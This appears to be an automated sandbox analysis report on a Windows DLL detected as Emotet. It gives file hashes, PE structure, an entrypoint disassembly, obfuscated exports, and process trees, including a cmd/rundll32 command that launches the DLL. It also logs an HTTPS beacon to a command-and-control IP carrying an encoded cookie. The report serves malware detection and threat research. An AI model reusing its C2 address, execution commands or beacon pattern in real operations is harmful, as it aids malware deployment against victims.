                        MD5:3D00C9DF8E5E1F47E6B20532AABBB4DA
                        SHA1:EE284E276B723832CF789E441C165C284CF3E6E9
                        SHA-256:25AD6701E1390B7B424DE6011D5ED110D51AEC075CBA958F70061D12CF1C823A
                        SHA-512:CE9ADC3D14389F35AA593B6C18C0A2455F3D46D888AEA3892389F4AA01E53F39345BD97A923342E0EC84915A539C23D23625CF379F22A5066939BACD3BC981A0
                        Malicious:false
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11275543432803492
                        Encrypted:false
                        SSDEEP:12:uTXm/Ey6q9995I+Y1miM3qQ10nMCldimE8eawHza1miI1/S/:bl68G+Y1tMLyMCldzE9BHza1tI8
                        MD5:DB838E4E82C37BA9F6B3A3D8ABEE5F63
                        SHA1:0C552D167ECA1FE99CEC5DB5D1363B0F60AA8EEC
                        SHA-256:D6E53CA12E78C95452BA62A335CA5F3F693D51D041D07600A505CF8F55CDCF73
                        SHA-512:0F92FE4D916A88AEDBB07948FC3CABF806A652F9DC3F3C6C57213D036EDBDE7FE56A61EF407C95FE0E28B56F02DC03CEFFC0AE01882F18EE4F27E79530EFA1F7
                        Malicious:false
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11262919192059402
                        Encrypted:false
                        SSDEEP:12:v7Xm/Ey6q9995I+Lh1mK2P3qQ10nMCldimE8eawHza1mKrf:6l68G+Lh1iPLyMCldzE9BHza1P
                        MD5:3E637E9236A071267C7F1E49DFC489FC
                        SHA1:2905C0C396334D9B37E2037309E0E5ED56AD7024
                        SHA-256:83523AB1EB55DB164B5CCB8EF4C9574BEE136A53397172C52D1F5BE8DB66CB21
                        SHA-512:79A74D7592AE36E3BF0F5DC314D6056A01A5F29238E3BD50945A879F8B35DC6B84963F1251BB3DC6A832D2AB7231CAA56BD601966F9DDAE74E38751113A258F7
                        Malicious:false
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11021535299334234
                        Encrypted:false
                        SSDEEP:12:266TXm/Ey6q9995I+o4q3qQ10nMCldimE8eawHjcDP:26fl68G+ULyMCldzE9BHjcL
                        MD5:3D00C9DF8E5E1F47E6B20532AABBB4DA
                        SHA1:EE284E276B723832CF789E441C165C284CF3E6E9
                        SHA-256:25AD6701E1390B7B424DE6011D5ED110D51AEC075CBA958F70061D12CF1C823A
                        SHA-512:CE9ADC3D14389F35AA593B6C18C0A2455F3D46D888AEA3892389F4AA01E53F39345BD97A923342E0EC84915A539C23D23625CF379F22A5066939BACD3BC981A0
                        Malicious:false
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11275543432803492
                        Encrypted:false
                        SSDEEP:12:uTXm/Ey6q9995I+Y1miM3qQ10nMCldimE8eawHza1miI1/S/:bl68G+Y1tMLyMCldzE9BHza1tI8
                        MD5:DB838E4E82C37BA9F6B3A3D8ABEE5F63
                        SHA1:0C552D167ECA1FE99CEC5DB5D1363B0F60AA8EEC
                        SHA-256:D6E53CA12E78C95452BA62A335CA5F3F693D51D041D07600A505CF8F55CDCF73
                        SHA-512:0F92FE4D916A88AEDBB07948FC3CABF806A652F9DC3F3C6C57213D036EDBDE7FE56A61EF407C95FE0E28B56F02DC03CEFFC0AE01882F18EE4F27E79530EFA1F7
                        Malicious:false
                        C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001@Y (copy)
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11262919192059402
                        Encrypted:false
                        SSDEEP:12:v7Xm/Ey6q9995I+Lh1mK2P3qQ10nMCldimE8eawHza1mKrf:6l68G+Lh1iPLyMCldzE9BHza1P
                        MD5:3E637E9236A071267C7F1E49DFC489FC
                        SHA1:2905C0C396334D9B37E2037309E0E5ED56AD7024
                        SHA-256:83523AB1EB55DB164B5CCB8EF4C9574BEE136A53397172C52D1F5BE8DB66CB21
                        SHA-512:79A74D7592AE36E3BF0F5DC314D6056A01A5F29238E3BD50945A879F8B35DC6B84963F1251BB3DC6A832D2AB7231CAA56BD601966F9DDAE74E38751113A258F7
                        Malicious:false
                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):9062
                        Entropy (8bit):3.162514829896139
                        Encrypted:false
                        SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z2+n:j+s+v+b+P+m+0+Q+q+N+n
                        MD5:45F724A01077F0B6AEE57CCEA1066184
                        SHA1:B48A7BF42762E10226AB294623D2096D16EE6D98
                        SHA-256:F6800E12FD9EEBFB859EECA2C2D1FBEF67B1B4A402D2984DACC1D78B870BE113
                        SHA-512:E149AED2BD14FAB717B9F6D83C9EC1BB50008CA22D4D7F42B8109C00E258A41D72C8FF85561F6B05AC0BF37CF8235F8D2CC54A9B65151CAF0E8C83E1CEC89FE6
                        Malicious:false
                        C:\Windows\appcompat\Programs\Amcache.hve
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1572864
                        Entropy (8bit):4.273017175011374
                        Encrypted:false
                        SSDEEP:12288:GB/9SE+9261nnSxOWwOwtbEPwcAsFR3GEabPLXU+WFrL+2cd1IjXv:M/9SE+9261nnSxFv
                        MD5:FCC37D9D122D15FE34FC4DDDD05F6038
                        SHA1:956B97E5CC071B8010E900AFEEDFCF8A95C3E634
                        SHA-256:5C694AD7B63140825A8C4F3BBDD126DCDFD23AAEC2DBE5851A29D1D9C97CFBCA
                        SHA-512:A299CBAC259AEF6AC5BE4BC809B512645A8F825E7D36AF1B127DE6BF07A84BB814AED15ECC90A4C859742B588BC36E1C8888FC892E0B01A2889F24A4FB775010
                        Malicious:false
                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):3.3965968422991564
                        Encrypted:false
                        SSDEEP:192:XF8Y71DXqxajVY9V5FSEsWftx1xVxgoJ4XyVaJNSdkyFn6yvRrsfEWfYjdsiDoX5:1jG5Rftx1TPJ4X47FFn7bZd1DoXzCa
                        MD5:5C550C70E4ED4E7E716488E6848031D4
                        SHA1:52D5CC4A6437C4B59D07743F140150B884019537
                        SHA-256:A33739BC0572CD6C528F843972424444CDDF7FB75064ED17C12B07843B1A6C74
                        SHA-512:3DF58BE4EDADA3442BD0042A0408B894F83D689AEF2EC434E7A58E19277DAD8D269B70FC5A0CFBDB3A78B9A418CD2E6600E890B08F2D8B802CF1720D1B04CF47
                        Malicious:false

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.0673433889863775
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:efELSMI5R4.dll
                        File size:372736
                        MD5:1ec5996508211a8d174a1a09d6289463
                        SHA1:ede146abf146c0dfdb88431dfecf5cc80b267335
                        SHA256:2933137a5e251f44b2e6d2cc919c8a679651a76b900b3b9e2b06edc73b64e5e6
                        SHA512:796194f3fa1b90a732fd2e567f6b3acd2443282e5c3c1d69db3f619b2285f5526e2059ac5ecfb47467cdec1539e3a0d936d83679677e67b87ee7573406f720bd
                        SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJye6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLTRQKqV4epRmxAvAD

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

                        Entrypoint:0x1001a401
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                        TLS Callbacks:0x1000c500
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:609402ef170a35cc0e660d7d95ac10ce

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007FD9248E77F7h
                        call 00007FD9248E7B88h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007FD9248E76A3h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        call 00007FD9248E809Eh
                        pop ecx
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        jmp 00007FD9248E77FFh
                        push dword ptr [ebp+08h]
                        call 00007FD9248EBB84h
                        pop ecx
                        test eax, eax
                        je 00007FD9248E7801h
                        push dword ptr [ebp+08h]
                        call 00007FD9248EBC00h
                        pop ecx
                        test eax, eax
                        je 00007FD9248E77D8h
                        pop ebp
                        ret
                        cmp dword ptr [ebp+08h], FFFFFFFFh
                        je 00007FD9248E8163h
                        jmp 00007FD9248E8140h
                        push ebp
                        mov ebp, esp
                        push 00000000h
                        call dword ptr [1002808Ch]
                        push dword ptr [ebp+08h]
                        call dword ptr [10028088h]
                        push C0000409h
                        call dword ptr [10028040h]
                        push eax
                        call dword ptr [10028090h]
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000324h
                        push 00000017h
                        call dword ptr [10028094h]
                        test eax, eax
                        je 00007FD9248E77F7h
                        push 00000002h
                        pop ecx
                        int 29h
                        mov dword ptr [1005AF18h], eax
                        mov dword ptr [1005AF14h], ecx
                        mov dword ptr [1005AF10h], edx
                        mov dword ptr [1005AF0Ch], ebx
                        mov dword ptr [1005AF08h], esi
                        mov dword ptr [1005AF04h], edi
                        mov word ptr [eax], es

                        Data Directories

                        Name                                  Virtual Address  Virtual Size  Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x58390          0x8ac         .rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x58c3c          0x3c          .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5d000          0x1bb0        .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x56fdc          0x54          .rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_TLS             0x57100          0x18          .rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x57030          0x40          .rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_IAT             0x28000          0x154         .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                        Sections

                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                        .text   0x1000           0x264f4       0x26600   False     0.546620521173   data       6.29652715831  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata  0x28000          0x313fa       0x31400   False     0.822468868972   data       7.4322686519   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data   0x5a000          0x1844        0xe00     False     0.270647321429   data       2.60881097454  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .pdata  0x5c000          0x66c         0x800     False     0.3583984375     data       2.21689595795  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc  0x5d000          0x1bb0        0x1c00    False     0.784598214286   data       6.62358237634  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Imports

                        DLL           Imports
                        KERNEL32.dll  HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                        USER32.dll    GetDC, ReleaseDC, GetWindowRect

                        Exports

                        Name               Ordinal  Address
                        Control_RunDLL     1        0x100010a0
                        ajkaibu            2        0x100016c0
                        akyncbgollmj       3        0x10001480
                        alrcidxljxybdggs   4        0x10001860
                        bgmotrriehds       5        0x10001820
                        bojkfvynhhupnooyb  6        0x100019f0
                        bujuoqldqlzaod     7        0x10001800
                        bunsahctogxzts     8        0x100019e0
                        cjogbtafwukesw     9        0x10001830
                        csbbcaopuok        10       0x100016a0
                        cyqrjpaeorjur      11       0x100015f0
                        dlrzuyaeqj         12       0x10001840
                        egiimrq            13       0x10001850
                        evhgyts            14       0x100014f0
                        fdqpjjjyuw         15       0x100017e0
                        finabzjyxhxnnuuv   16       0x10001510
                        fkeacqpbbfw        17       0x10001910
                        fuwsgzf            18       0x10001790
                        fzbmpailk          19       0x10001980
                        gamsrhauvgl        20       0x10001810
                        gjfqgtgk           21       0x10001a10
                        gwsmfxfmekkyr      22       0x100018b0
                        haymuvtatadeydqmk  23       0x10001530
                        hqruohhkvpdalhq    24       0x10001620
                        htdaydfvtjlujwcaj  25       0x10001660
                        hzyrvjtx           26       0x100017c0
                        ifnsupqhxkwj       27       0x10001870
                        ijhgowlpmypocg     28       0x10001720
                        ispjhrqaxnyflnn    29       0x100015a0
                        iszvcqv            30       0x100017a0
                        ixgucop            31       0x100018d0
                        jcdvrhrguqtjpkc    32       0x100016b0
                        jkfyadsdpoks       33       0x100019c0
                        kfzgxmljkwaqy      34       0x10001730
                        kzfvroxozxufciczm  35       0x10001740
                        lpstjqa            36       0x10001900
                        ltkoyvzovzkqemyw   37       0x10001630
                        mdigcwjymnzvgaql   38       0x100014d0
                        mefathlzguuhqodfx  39       0x10001950
                        mgsrmfbja          40       0x10001500
                        mrxhcceopg         41       0x100014a0
                        nafhmuoq           42       0x100018f0
                        nefxgpc            43       0x100018a0
                        nrehxpiznrppeu     44       0x10001690
                        nucocnvjyqp        45       0x100018e0
                        obxoxtcbntaxofr    46       0x10001890
                        ofrzojd            47       0x100016e0
                        oofbctfc           48       0x10001550
                        opzpazspbecyjojf   49       0x100015b0
                        oqoigff            50       0x10001a00
                        oujlzhzvhjh        51       0x100016f0
                        ovpsanbypajv       52       0x100015e0
                        pblpcaadqbdxyb     53       0x10001680
                        ragwdgnyohftj      54       0x100017d0
                        rfosmac            55       0x10001710
                        rgymbuetvifqjqdlo  56       0x10001930
                        rmoxbxbbgidnbds    57       0x10001970
                        rxnkmfbycdcc       58       0x10001560
                        sefltbc            59       0x10001880
                        sgieprcsphl        60       0x100019a0
                        shpcmnqzvyltgdt    61       0x100016d0
                        slktbekupvmdbt     62       0x100015c0
                        sormivnk           63       0x10001570
                        tdblkstlyin        64       0x10001600
                        tkllyrc            65       0x10001650
                        tkwpnvfqnbpbdqe    66       0x10001a20
                        tnhtgnjrabqakgeke  67       0x10001700
                        tzpmcwwig          68       0x10001520
                        uceklmggjof        69       0x10001610
                        ukwdddyj           70       0x10001640
                        uwnaptydgur        71       0x10001940
                        vjusqoeo           72       0x10001580
                        vnyufpq            73       0x10001590
                        vsrwmkhzkrtlexxb   74       0x100014e0
                        wermsdfzb          75       0x10001770
                        wkhpfdjkypy        76       0x100014c0
                        wksndtayhfm        77       0x100015d0
                        wnjvxspilxpchq     78       0x10001670
                        wuqwfssiddrcl      79       0x10001570
                        wyyhtqptznbrknitg  80       0x100017f0
                        wzkcijdvadq        81       0x10001540
                        wzxlvxuyy          82       0x100019b0
                        xhtxeilfgsghxik    83       0x10001780
                        xvdijhconoukll     84       0x100014b0
                        ybbwnezvxfafm      85       0x10001750
                        yeylpreasnzamgac   86       0x100019d0
                        ypkidshxgzkkehc    87       0x100018c0
                        ypzvmpfbgai        88       0x10001760
                        zbrzizodycg        89       0x10001990
                        zdiuqcnzg          90       0x10001920
                        zfkwwtxd           91       0x10001490
                        zktykfwmaehxg      92       0x10001600
                        zmkbqvofdhermov    93       0x10001960
                        zvtqmkitgmzgo      94       0x100017b0

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Dec 2, 2021 00:47:01.562006950 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:01.562064886 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:01.562290907 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:01.589068890 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:01.589097977 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:01.925051928 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:01.925203085 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.035310984 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.035355091 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:03.035959005 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:03.036048889 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.038997889 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.080895901 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:03.570858955 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:03.570955038 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.570976973 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3
                        Dec 2, 2021 00:47:03.571068048 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.572988033 CET | 49815 | 443 | 192.168.2.3 | 45.63.5.129
                        Dec 2, 2021 00:47:03.573019028 CET | 443 | 49815 | 45.63.5.129 | 192.168.2.3

                        HTTP Request Dependency Graph

                        • 45.63.5.129

                        HTTPS Proxied Packets

                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        0 | 192.168.2.3 | 49815 | 45.63.5.129 | 443 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-01 23:47:03 UTC | 0 | OUT | GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1
                        Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=
                        Host: 45.63.5.129
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        2021-12-01 23:47:03 UTC | 0 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Wed, 01 Dec 2021 23:47:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        2021-12-01 23:47:03 UTC | 0 | IN | Data Raw: 31 35 30 0d 0a f5 5b a4 bb d6 07 ae f7 9c f1 7e 12 9a 41 38 52 b8 c8 52 77 eb d9 60 23 59 bc 11 bc d3 f3 e9 69 7d 5a ca 61 9e 18 c8 0d 6e cd 6e 1f 13 65 a7 9e 4e 34 40 27 81 92 ea 88 79 1b cc 1d 9f d2 d7 dc e3 c0 d0 39 98 69 38 79 dc f6 5f 8b 02 5d f4 be 6c a7 cc 80 d2 25 95 7a 0f c9 42 7b 4b 70 53 da c3 4c 7d 00 e8 ec 7e ca 8e f3 05 c0 16 cb 99 84 e6 21 fc 02 bc be d0 1c 5b 87 c5 e1 de 8f 96 51 7d 0e f0 da 1f 98 19 d1 24 88 79 9c 95 35 25 50 9e f9 97 87 f3 70 40 ec a4 96 68 01 92 e7 ef c8 b0 0b 7d 5f 1d bf 2d be 69 6b 46 99 27 60 32 12 4f 12 91 74 b2 67 2a 99 11 97 c6 bb df bc 6c bc 3f 34 57 a7 95 28 2b ac f0 5f e7 20 bf 78 e3 5e bf 8d e9 1f 7d 39 30 f2 cd 59 71 7b a9 a0 80 41 ac af ed 77 aa 95 a5 e3 0b 65 81 95 ae 09 91 52 bd 2c 7d ac f5 31 0a a3 a0 6a
                        Data Ascii: 150[~A8RRw`#Yi}ZanneN4@'y9i8y_]l%zB{KpSL}~![Q}$y5%Pp@h}_-ikF'`2Otg*l?4W(+_ x^}90Yq{AweR,}1j


                        Code Manipulations

                        Statistics

                        Behavior

                        System Behavior

                        General

                        Start time:00:43:10
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:43:10
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll"
                        Imagebase:0x350000
                        File size:893440 bytes
                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                        Imagebase:0xd80000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
